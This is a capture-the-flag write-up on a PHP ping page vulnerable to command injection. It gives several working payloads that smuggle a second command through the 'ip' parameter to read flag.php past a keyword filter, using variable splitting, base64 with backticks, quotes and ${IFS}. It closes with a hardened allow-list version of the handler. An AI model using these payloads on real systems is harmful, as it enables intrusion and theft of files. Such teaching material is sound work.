Source code:
<?php
highlight_file("index.php");
if(preg_match("/flag/i", $_GET["ip"]))
{
die("no flag");
}
system("ping -c 3 $_GET[ip]");
?>
The obvious command execution:
From the above, we can see that flag.php is in the current directory, so could we just cat ./flag.php directly?
But the flag keyword is filtered. Bypassing it is very simple (I actually ran into the same thing not long ago...). There are many ways around it, and the idea behind all of them is the same: keep the literal keyword out of the request so that the regex never matches.
Bypass
1. Use variables to bypass:
By assigning pieces of the word to shell variables and concatenating them, the keyword never appears literally in the request:
payload:
?ip=1;a=fl;b=ag;cat $a$b.php
View source code:
2. Encode with base64
The command we need to execute is passed in base64-encoded, then decoded and executed:
?ip=1;cat `echo 'Li9mbGFnLnBocAo=' | base64 -d`
A note on this: the backtick ` performs command substitution on the Linux command line. Command substitution means the shell can insert the standard output of one command anywhere in another command line, that is, it runs the enclosed command and replaces it with its result. So the output of the base64 decode inside the backticks (./flag.php) is substituted back into the command, and the restriction is bypassed. (It is not only the backtick: $() also performs command substitution in the shell.) This indirectly executes cat ./flag.php.
View source code:
3. Bypass the keyword with quotes
The point is again to prevent the keyword from being matched: the quotes break up the word in the request, and the shell strips them before running the command, so it is easy to handle.
payload:
?ip=1;cat ./fl'ag'.php
View source code:
4. Bypassing space filters
If you run into a filter on spaces, you can use ${IFS}, <, $IFS, $IFS$9 and similar characters to replace them.
Of course, there are far more bypass techniques than the ones listed above; you need to know how to adapt.
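For contrast, here is a hardened version of the ping handler at the top of the page. It is an added example, not code from the original writeup: instead of blacklisting the word "flag", it allow-lists the input with filter_var(FILTER_VALIDATE_IP) and quotes it with escapeshellarg(), so every payload shown above is rejected before any shell runs. The helper name build_ping_command is my own.

```php
<?php
// Added example: hardened replacement for the vulnerable ping handler.
// Returns the safe command string, or null if the input is not an IP address.
function build_ping_command(string $ip): ?string
{
    // Allow-list: accept only a syntactically valid IPv4 or IPv6 address.
    // Every payload on this page contains ';', '$', '`', quotes or ${IFS},
    // none of which can appear in a valid IP, so they are all rejected here.
    if (filter_var($ip, FILTER_VALIDATE_IP) === false) {
        return null;
    }
    // Defence in depth: even a validated value is passed as one single-quoted
    // shell argument, so the shell never interprets metacharacters in it.
    return 'ping -c 3 ' . escapeshellarg($ip);
}

// Constructed inputs: the payloads from this page plus one legitimate address.
$samples = [
    '1;a=fl;b=ag;cat $a$b.php',
    "1;cat `echo 'Li9mbGFnLnBocAo=' | base64 -d`",
    "1;cat ./fl'ag'.php",
    '1;cat${IFS}./flag.php',
    '127.0.0.1',
];
foreach ($samples as $s) {
    $cmd = build_ping_command($s);
    echo $s, ' => ', $cmd === null ? 'rejected' : $cmd, PHP_EOL;
}

// Request handler: only the validated, quoted command ever reaches system().
$cmd = build_ping_command($_GET['ip'] ?? '');
if ($cmd === null) {
    http_response_code(400);
    die('invalid ip');
}
system($cmd);
?>
```

Only the last sample produces a command (ping -c 3 '127.0.0.1'); the four injection payloads are rejected by the allow-list before escapeshellarg() is even reached.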
flag:
flag{I_like_qwb_web